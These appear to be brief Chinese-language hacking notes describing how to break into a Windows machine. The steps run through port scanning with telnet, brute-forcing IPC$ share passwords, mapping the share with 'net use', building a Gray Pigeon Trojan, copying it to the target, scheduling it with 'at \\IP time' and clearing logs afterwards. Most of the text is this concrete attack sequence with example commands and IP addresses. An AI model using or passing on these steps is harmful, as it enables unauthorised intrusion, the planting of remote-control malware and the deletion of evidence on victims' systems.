a. 授权 b. 信息收集 nslookup whois c. 扫描漏洞 从高至低, IP -> Port 软件 网站 e. 漏洞利用
d. 提权(Shell环境、桌面环境 最高权限)
f. 清除日志
telnet <IP> <port> # 使用该命令 可以通过回应来测试端口号是否开启 net use <F:> <IP\...> <pwd> /user:<user> # 以user身份登录,将共享盘映射到本机上的 F盘 net use <F:> /del net use <ipc$> <pwd> /user:<user> time # 查看时间 time \\<ip> # 查看目标电脑的时间 at # 列出task at <time> <...> # 在time这个时间,进行...任务。例如 at \\192.168.1.1 11:46 "c:\windows\system32\sds.exe" 即在某个时间执行sds.exe 简单流程 1. scanport 扫描软件, 扫描开放端口 2. 漏洞利用 IPC$: 进行暴力破解 NTscan 实际该软件用的是命令 telnet use <IP> <pwd> /user:<user> 3. net use f: <IP\IPC$> <pwd> /user:<user> 将共享IPC$ 映射到本地F: 4. 制作木马 利用 灰鸽子软件 5. 植入木马 copy <src> <des> 6. 设置计划任务自动执行木马 net time <IP> at <IP> <time> "<>" # 例如植入软件为 c:/windows/system32/dsc.exe # 在 远程电脑192.168.5.2, 时间是 11:16 # at \\192.168.5.2 11:16 "c:/windows/system32/dsc.exe" 7. 清除日志